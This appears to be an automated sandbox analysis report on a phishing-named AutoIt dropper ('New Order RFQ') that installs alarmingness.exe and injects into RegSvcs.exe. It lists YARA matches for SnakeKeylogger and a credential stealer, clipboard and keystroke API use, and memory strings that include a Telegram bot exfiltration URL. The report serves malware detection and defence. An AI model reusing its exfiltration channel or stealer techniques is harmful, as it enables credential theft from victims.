Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: alarmingness.exe, 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, alarmingness.exe, 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002C83000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123h
Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123h6
Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: RegSvcs.exe, 00000003.00000002.3642278898.0000000003D54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3641749864.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_007B4164
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_007B4164
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 1_2_00FF4164
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 0_2_007B3F66
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, | 0_2_007A001C
Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_007CCABC
Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_0100CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 1_2_0100CABC

              System Summary

              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: This is a third-party compiled AutoIt script.0_2_00743B3A
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: New Order RFQ- 19A20060.exe, 00000000.00000000.1178148602.00000000007F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e32f0388-4
              Source: New Order RFQ- 19A20060.exe, 00000000.00000000.1178148602.00000000007F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7de0d48f-7
              Source: New Order RFQ- 19A20060.exe, 00000000.00000003.1188607399.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c6a4ba46-9
              Source: New Order RFQ- 19A20060.exe, 00000000.00000003.1188607399.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b2523690-9
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: This is a third-party compiled AutoIt script.1_2_00F83B3A
              Source: alarmingness.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: alarmingness.exe, 00000001.00000000.1189092532.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ebdf4e66-c
              Source: alarmingness.exe, 00000001.00000000.1189092532.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bee8c395-2
              Source: alarmingness.exe, 0000000A.00000002.1317901565.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_819e091d-1
              Source: alarmingness.exe, 0000000A.00000002.1317901565.0000000001034000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c0b11ea3-2
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_aa8a9f59-d
              Source: New Order RFQ- 19A20060.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c5337cb8-0
              Source: alarmingness.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d1a15d9d-5
              Source: alarmingness.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_59a292fc-4
              Source: initial sampleStatic PE information: Filename: New Order RFQ- 19A20060.exe
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_007AA1EF
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00798310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00798310
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007A51BD
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00FE51BD
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074E6A00_2_0074E6A0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076D9750_2_0076D975
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074FCE00_2_0074FCE0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007621C50_2_007621C5
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007762D20_2_007762D2
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C03DA0_2_007C03DA
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0077242E0_2_0077242E
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007625FA0_2_007625FA
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0079E6160_2_0079E616
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007566E10_2_007566E1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0077878F0_2_0077878F
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C08570_2_007C0857
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007768440_2_00776844
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007588080_2_00758808
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007A88890_2_007A8889
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076CB210_2_0076CB21
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00776DB60_2_00776DB6
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00756F9E0_2_00756F9E
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007530300_2_00753030
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076F1D90_2_0076F1D9
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007631870_2_00763187
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007412870_2_00741287
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007614840_2_00761484
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007555200_2_00755520
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007676960_2_00767696
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007557600_2_00755760
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007619780_2_00761978
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007C7DDB0_2_007C7DDB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0076BDA60_2_0076BDA6
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00761D900_2_00761D90
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_0074DF000_2_0074DF00
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00753FE00_2_00753FE0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_012522B80_2_012522B8
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8E6A01_2_00F8E6A0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAD9751_2_00FAD975
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8FCE01_2_00F8FCE0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA21C51_2_00FA21C5
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB62D21_2_00FB62D2
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_010003DA1_2_010003DA
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB242E1_2_00FB242E
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA25FA1_2_00FA25FA
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F966E11_2_00F966E1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FDE6161_2_00FDE616
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB878F1_2_00FB878F
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FE88891_2_00FE8889
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB68441_2_00FB6844
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F988081_2_00F98808
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_010008571_2_01000857
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FACB211_2_00FACB21
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FB6DB61_2_00FB6DB6
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F96F9E1_2_00F96F9E
